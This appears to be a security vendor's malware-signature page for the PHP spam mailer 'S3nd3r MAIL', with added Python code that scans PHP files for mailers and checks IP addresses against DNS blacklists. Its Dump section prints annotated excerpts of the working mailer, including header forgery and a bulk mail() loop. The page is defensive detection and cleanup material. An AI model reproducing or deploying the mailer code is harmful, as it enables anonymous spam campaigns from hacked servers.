Malware Signatures

php.hacktool.mailer-s3nd3r.001

Mailers are a category of script that attackers install on compromised servers to send out spam and anonymous email.
They use the server's bandwidth and other resources to send large volumes of spam in a short time. Moreover, the headers of such emails carry no trace of the attacker; they lead back to the hacked server,
so the spam campaign stays largely anonymous. Hacked servers are not a scarce resource, and spammers do not care much if one of them gets blacklisted for spamming; they simply move on to another server. To minimize the risk of
blacklisting, however, they usually spread the mailing evenly across several hacked servers.
"S3nd3r MAIL" is a simple spam script that sends email to a list of recipients supplied in an uploaded file. Its only protection against strangers using the script is a basic check that one form field is non-empty.
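The traits just described (a recipient list uploaded as a file, a send loop around mail() with a sleep between messages, forged headers and a spoofed envelope sender) are exactly what a file scan should key on. The following is an added example, not part of this page or of the malware sample: a small Python indicator scan over PHP source. The patterns are derived from the S3nd3r MAIL excerpt further down this page plus generic mass-mailer traits; the weights and verdict thresholds are an illustrative assumption, and both sample inputs are constructed here.

```python
import os
import re
import sys
from dataclasses import dataclass

# Indicators drawn from the S3nd3r MAIL excerpt on this page plus generic mass-mailer
# traits. Weights and thresholds are an assumption for illustration, not a published scheme.
INDICATORS = (
    # name,              compiled pattern,                                                  weight
    ("mail_call",        re.compile(r"\bmail\s*\("),                                          1),
    ("recipient_upload", re.compile(r"\$_FILES\s*\[[^\]]+\]\s*\[\s*['\"]tmp_name['\"]\s*\]"),  2),
    ("file_to_list",     re.compile(r"\bfile\s*\(\s*\$\w+"),                                  1),
    ("mail_in_loop",     re.compile(r"\b(?:while|foreach|for)\b[\s\S]{0,600}?\bmail\s*\("),   2),
    ("sleep_throttle",   re.compile(r"\bsleep\s*\(\s*\$\w+"),                                 1),
    ("forged_headers",   re.compile(r"X-Originating-IP|X-Mailer:|Return-Path:", re.I),        1),
    ("no_time_limit",    re.compile(r"time_limit['\"]?\s*,\s*0|set_time_limit\s*\(\s*0"),     1),
    ("sender_override",  re.compile(r"ini_set\s*\(\s*['\"]sendmail_from"),                    2),
    ("known_banner",     re.compile(r"S3nd3r MAIL|M4R3CH4L-CMD"),                             5),
)


@dataclass(frozen=True)
class ScanResult:
    score: int
    matched: tuple
    verdict: str  # "clean", "suspicious" or "mailer"


def scan_php_source(src: str) -> ScanResult:
    """Score one PHP source text against the indicator table."""
    matched = tuple(name for name, pat, _ in INDICATORS if pat.search(src))
    score = sum(w for name, _, w in INDICATORS if name in matched)
    if score >= 6:
        verdict = "mailer"
    elif score >= 3:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return ScanResult(score, matched, verdict)


def scan_tree(root: str):
    """Yield (path, ScanResult) for every PHP file under root that is not clean."""
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith((".php", ".phtml", ".php5")):
                path = os.path.join(dirpath, fn)
                try:
                    with open(path, "r", encoding="utf-8", errors="replace") as fh:
                        result = scan_php_source(fh.read())
                except OSError:
                    continue
                if result.verdict != "clean":
                    yield path, result


# Constructed sample: the key lines of the mailer excerpt on this page.
MAILER_SAMPLE = r'''<?php
// ..::S3nd3r MAIL::..
$FromMail = $_POST['ERemetente'];
$arq_temp = $_FILES["emails"]["tmp_name"];
$Lista = (file($arq_temp));
$Conteudo = stripslashes($_POST['Conteudo']);
$IntervalX = $_POST['Interval'];
@ini_set("sendmail_from", $FromMail);
@ini_set("time_limit",0);
$headers = "From: $FromName <$FromMail>\n";
$headers .= "Return-Path: $FromMail\n";
$headers .= "X-Mailer: iGMail [www.ig.com.br]\n";
$headers .= "X-Originating-IP: [201.201.120.121]\n";
while (list($pos, $val) = each($Lista)) {
    $val = trim($val);
    mail($val, $Subject, $Conteudo, $headers);
    sleep($IntervalX);
}
'''

# Constructed sample: an ordinary contact form that also calls mail() once.
BENIGN_SAMPLE = r'''<?php
$to = "webmaster@example.com";
$body = $_POST['message'];
$headers = "From: noreply@example.com\r\n";
mail($to, "Contact form", $body, $headers);
'''

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, res in scan_tree(sys.argv[1]):
            print(f"{res.verdict:10} score={res.score:2} {path}  {', '.join(res.matched)}")
    else:
        for label, src in (("mailer sample", MAILER_SAMPLE), ("contact form", BENIGN_SAMPLE)):
            res = scan_php_source(src)
            print(f"{label}: {res.verdict} (score {res.score}) {res.matched}")
```

The banner string is a signature for this one family; the generic indicators alone (upload-driven recipient list, loop around mail(), sender override, throttling sleep) still push a renamed copy over the threshold, which is the point of scoring behaviour rather than names. Run it as `python scan.py /var/www` to walk a document root.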

Affecting

Any server with PHP enabled.

Cleanup

Delete the mailer script and scan your server for other types of malware, specifically backdoors. Make sure to identify and close the security hole.
You also need to check whether your server's IP address has been blacklisted by the various anti-spam blacklist providers as a result of the hacker's activity.
You can also sign up with us and let our team remove the malware for you.
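The blacklist check in the step above is a DNS lookup: the server's address is written in reverse (octets for IPv4, nibbles for IPv6), the blacklist zone is appended, and an A record in 127.0.0.0/8 means the address is listed. The following is an added example, not code from this page or any blacklist operator: a Python checker that builds the query names and interprets the answers. The zone list is an assumption for illustration (each operator publishes its own usage terms and return-code meanings), and the offline resolver is constructed here, modelled on the Spamhaus test address 127.0.0.2.

```python
import ipaddress
import socket
import sys

# Zones to query. Assumed list for illustration; check each operator's terms of use.
ZONES = ("zen.spamhaus.org", "bl.spamcop.net", "b.barracudacentral.org")

# Genuine listing codes live in 127.0.0.0/24. Spamhaus signals query problems
# (e.g. lookups via open public resolvers) with 127.255.255.x, which must not
# be mistaken for a listing.
LISTING_RANGE = ipaddress.ip_network("127.0.0.0/24")


def dnsbl_query_name(ip: str, zone: str) -> str:
    """Build the DNSBL lookup name: reversed address labels followed by the zone."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 4:
        labels = reversed(addr.exploded.split("."))            # 203.0.113.5 -> 5.113.0.203
    else:
        labels = reversed(addr.exploded.replace(":", ""))      # one label per hex nibble
    return ".".join(labels) + "." + zone


def live_resolver(name: str) -> list:
    """Return the A records for name; NXDOMAIN (not listed) yields an empty list."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except socket.gaierror:
        return []


def check_listed(ip: str, zones=ZONES, resolve=live_resolver) -> dict:
    """Return {zone: [codes]} for every zone that lists ip. The resolver is
    injected so the logic can be exercised without network access."""
    hits = {}
    for zone in zones:
        codes = [a for a in resolve(dnsbl_query_name(ip, zone))
                 if ipaddress.ip_address(a) in LISTING_RANGE]
        if codes:
            hits[zone] = codes
    return hits


def constructed_resolver(name: str) -> list:
    """Constructed offline stand-in: only the documented test point 127.0.0.2 is
    listed on zen (SBL, XBL and PBL codes); every other name is NXDOMAIN."""
    table = {"2.0.0.127.zen.spamhaus.org": ["127.0.0.2", "127.0.0.4", "127.0.0.10"]}
    return table.get(name, [])


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for ip in sys.argv[1:]:                                  # real lookups
            print(ip, "->", check_listed(ip) or "not listed")
    else:                                                        # offline demonstration
        for ip in ("127.0.0.2", "203.0.113.5"):
            print(ip, "->", check_listed(ip, resolve=constructed_resolver) or "not listed")
```

Run it with the server's public address as an argument (`python dnsbl.py 203.0.113.5`); use the machine's own resolver rather than a public one, since some zones refuse or flag queries from open resolvers. A listing tells you what to clean up and which delisting form to file, but it does not tell you which script did the sending; the file scan above does that.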

Dump

...excerpts..
...

:::::::::::::::::::::::::::::::::::::::::::::
..::S3nd3r MAIL::..
:::::::::::::::::::::::::::::::::::::::::::::
<!--
Developed by : M4R3CH4L-CMD
Contact : <---(M4R3CH4L-CMD@hotmail.com.br)-->

<html>
<head>
<title> - xxxsendxxx -</title>

...

// Check that the form was filled in. This is the script's only "verification":
// any non-empty value in the "teste" POST field is accepted.
$teste = $_POST['teste'];
If ($teste == null){exit (/*"<br><center><b>Preenche corretamente os campos</b></center>"*/);}

// Read the form data: sender name and address, subject, uploaded recipient list,
// message body and the delay between messages. All of it is attacker-controlled.
$FromName = $_POST['NRemetente'];
$FromMail = $_POST['ERemetente'];
$Subject = $_POST['Assunto'];
$MailServer = explode("@",$FromMail,2); $MailServer = $MailServer['1']; // domain part of the forged sender, reused in Message-ID
$arq_temp = $_FILES["emails"]["tmp_name"]; // recipient list arrives as a file upload
$Lista = (file($arq_temp)); // one address per line
$QtdMail = count($Lista);
$Conteudo = stripslashes($_POST['Conteudo']);
$IntervalX = $_POST['Interval'];

// Runtime configuration: forge the envelope sender and try to lift the execution
// time limit. "time_limit" is not a PHP ini directive (max_execution_time is), so
// the second call has no effect; the @ hides any complaint.
@ini_set("sendmail_from", $FromMail);
@ini_set("time_limit",0);

// Build the email headers. Every value is either attacker-supplied or a hard-coded
// fake chosen to make the message look like ordinary webmail traffic.
$headers = "From: $FromName <$FromMail>\n";
$headers .= "MIME-Version: 1.0\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\n";
$headers .= "Content-Transfer-encoding: 8bit\n";
$headers .= "Reply-To: $FromName <$FromMail>\n";
$headers .= "Return-Path: $FromMail\n";
$headers .= "Message-ID: <".md5(uniqid(time()))."@$MailServer>\n";
$headers .= "X-Priority: 3\n";
$headers .= "X-MSmail-Priority: High\n";
//$headers .= "X-Mailer: Microsoft Office Outlook, Build 11.0.5510\n";
//$headers .= "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441\n";
$headers .= "X-Mailer: iGMail [www.ig.com.br]\n";
$headers .= "X-Originating-Email: [$FromName]\n";
$headers .= "X-Sender: $FromName\n";
$headers .= "X-Originating-IP: [201.201.120.121]\n";
$headers .= "X-iGspam-global: Unsure, spamicity=0.570081 - pe=5.74e-01 - pf=0.574081 - pg=0.574081\n";

// Start the send. Print a summary of the run (in Portuguese: "everything is ready,
// let's start sending", sender, subject, list file and size, interval) when the
// list has more than one entry; otherwise stop.
If ($QtdMail != 1){
echo str_repeat("-",126) . "<br>";
echo "<B>Estando tudo preparado vamos comecar o envio</B><br>";
echo "<B>De:</B> $FromName <$FromMail><br>";
echo "<B>Assunto:</B> $Subject<br>";
echo "<B>Para Lista:</B> $arq_temp <B>Que contem:</B> $QtdMail <B>e-mails</B><br>";
echo "<B>Com intervalo de:</B> $IntervalX <B>segundos entre cada envio</B><br>";
echo str_repeat("-",126) . "<br>";
} else {exit;}

$error = 0;
$donen = 0;

// Send to every address in the list, pausing $IntervalX seconds between messages
// to stay under rate limits. each() was removed in PHP 8.0, so this sample only
// runs on PHP 7.x and earlier. Progress lines are in Portuguese: "Enviado para"
// = sent to, "Nao Enviado para" = not sent to, "Erro" = error, "de" = of.
while (list($pos, $val) = each($Lista)) {
$val = trim($val);
if( mail($val, $Subject, $Conteudo, $headers) ){
$donen++;
echo '<font color="#0033FF" size="2" face="Verdana, Arial, Helvetica, sans-serif">OK - Enviado para [' . $val . '] - { ' . $donen . ' Ok | ' . $error . ' Erro } - [ ' . ($pos+1) . ' de ' . $QtdMail . ' ]</font><br>';
}
else{
$error++;
echo '<font color="#FF0000" size="2" face="Verdana, Arial, Helvetica, sans-serif">ERRO - Nao Enviado para [' . $val . '] - { ' . $donen . ' Ok | ' . $error . ' Erro } - [ ' . ($pos+1) . ' de ' . $QtdMail . ' ]</font><br>';
}

sleep($IntervalX);
}
...